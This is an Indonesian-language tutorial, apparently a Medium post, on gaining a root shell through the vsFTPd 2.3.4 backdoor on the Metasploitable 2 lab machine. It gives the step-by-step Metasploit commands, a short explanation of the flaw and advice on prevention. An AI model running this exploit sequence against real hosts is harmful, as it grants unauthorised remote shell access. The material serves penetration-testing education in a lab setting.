← Back to list

Tutorial: Exploitasi Backdoor vsFTPd 2.3.4 Port 21 FTP pada Metasploitable 2

DISCLAIMER

Feren Public · 2025-10-11 16:45 · 0 claps · 2.5 min read
#metasploitable2 #metasploit #ftp #vsftpd #exploitation
Open on Medium ↗
Wiki topics: FT · Fine-tuning & Adaptation

Tutorial: Exploitasi Backdoor vsFTPd 2.3.4 Port 21 FTP pada Metasploitable 2

DISCLAIMER

Seluruh konten yang disampaikan dalam tulisan ini dibuat untuk tujuan edukasi dan pembelajaran di bidang keamanan siber. Informasi, teknik, maupun demonstrasi yang ditampilkan tidak dimaksudkan untuk digunakan dalam aktivitas yang melanggar hukum, merusak sistem, atau merugikan pihak mana pun.

Segala bentuk tindakan yang dilakukan berdasarkan informasi dari konten ini sepenuhnya menjadi tanggung jawab masing-masing pembaca. Pembuat konten tidak bertanggung jawab atas penyalahgunaan informasi maupun konsekuensi hukum yang timbul.

Harap selalu menerapkan praktik keamanan secara etis, melakukan pengujian hanya pada sistem yang Anda miliki atau Anda peroleh izin resminya, serta mematuhi seluruh peraturan dan hukum yang berlaku.

Metasploitable 2 memiliki layanan FTP yang rentan dengan versi vsFTPd 2.3.4 yang mengandung backdoor terkenal. Dalam tutorial ini, kita akan memanfaatkan kerentanan ini untuk mendapatkan akses shell pada sistem target.

1. Persiapan Environment

Mulai Layanan PostgreSQL

Metasploit Framework membutuhkan database PostgreSQL untuk operasionalnya. Jalankan perintah berikut:

service postgresql start

Anda mungkin akan diminta memasukkan password sistem:

Gambar 1. Authentication untuk Menjalankan PostgreSQL

Gambar 1. Authentication untuk Menjalankan PostgreSQL

Verifikasi Status PostgreSQL

Pastikan layanan PostgreSQL sudah aktif dengan perintah:

service postgresql status

Pastikan status menunjukkan active.

2. Memulai Metasploit Framework

Jalankan konsol Metasploit dengan perintah:

msfconsole

Tunggu hingga interface Metasploit sepenuhnya terbuka dan siap digunakan.

Gambar 2. Tampilan Interface Metasploit

Gambar 2. Tampilan Interface Metasploit

3. Mencari Eksploit yang Tepat

Kita akan mencari eksploit untuk vsFTPd 2.3.4 menggunakan fitur search:

search vsftpd 2.3.4

Hasil pencarian akan menampilkan eksploit backdoor yang tersedia.

Gambar 3. Hasil Pencarian Eksploit Backdoor vsFTPd 2.3.4

Gambar 3. Hasil Pencarian Eksploit Backdoor vsFTPd 2.3.4

4. Konfigurasi Eksploit

Gunakan Modul Eksploit

Pilih dan gunakan modul eksploit backdoor vsFTPd:

use exploit/unix/ftp/vsftpd_234_backdoor

Cek Opsi yang Tersedia

Lihat opsi yang perlu dikonfigurasi:

show options

Gambar 4. Hasil show options

Gambar 4. Hasil show options

Perhatikan bahwa RHOSTS masih kosong dan perlu diisi.

Set Target IP

Atur alamat IP target Metasploitable 2:

set RHOSTS 192.168.1.10

(Ganti 192.168.1.10 dengan IP address Metasploitable 2 Anda)

Verifikasi Konfigurasi

Cek kembali opsi untuk memastikan konfigurasi sudah benar:

show options

Pastikan RHOSTS sudah terisi dengan IP target yang benar.

5. Melakukan Eksploitasi

Jalankan eksploitasi dengan perintah:

exploit

6. Verifikasi Keberhasilan

Jika berhasil, Anda akan mendapatkan shell akses pada sistem target. Verifikasi dengan perintah:

whoami

Untuk memastikan Anda berada di sistem target, periksa IP address:

ifconfig

Indikasi keberhasilan:

  • Perintah whoami menampilkan user sistem target
  • IP address yang ditampilkan ifconfig sesuai dengan IP Metasploitable 2
  • Prompt berubah menjadi shell sistem target

Penjelasan Kerentanan

vsFTPd 2.3.4 mengandung backdoor yang diaktifkan ketika username mengandung karakter tertentu (:). Backdoor ini membuka port yang dapat digunakan untuk mendapatkan akses shell tanpa otentikasi.

Langkah Pencegahan

  • Upgrade vsFTPd ke versi terbaru
  • Monitor koneksi jaringan yang mencurigakan
  • Gunakan firewall untuk membatasi akses ke port FTP
  • Implementasi intrusion detection system

Disclaimer: Tutorial ini hanya untuk tujuan edukasi dan testing dalam lingkungan yang terkontrol. Selalu dapatkan izin tertulis sebelum melakukan testing pada sistem mana pun.

Dengan mengikuti tutorial ini, Anda berhasil mengeksploitasi kerentanan backdoor pada vsFTPd 2.3.4 dan mendapatkan akses shell pada sistem target. Eksploitasi ini menunjukkan pentingnya menjaga software selalu up-to-date.

Jika ada pertanyaan atau kendala, silakan tinggalkan komentar di bawah!


메타데이터
post_id
4450fa49ff89
slug
tutorial-exploitasi-backdoor-vsftpd-2-3-4-port-21-ftp-pada-metasploitable-2-4450fa49ff89
url
https://medium.com/@ferenpublic/tutorial-exploitasi-backdoor-vsftpd-2-3-4-port-21-ftp-pada-metasploitable-2-4450fa49ff89
canonical_url
https://medium.com/@ferenpublic/tutorial-exploitasi-backdoor-vsftpd-2-3-4-port-21-ftp-pada-metasploitable-2-4450fa49ff89
author_url
https://medium.com/@ferenpublic
status
ok
fetched_at
2026-07-16 22:15:16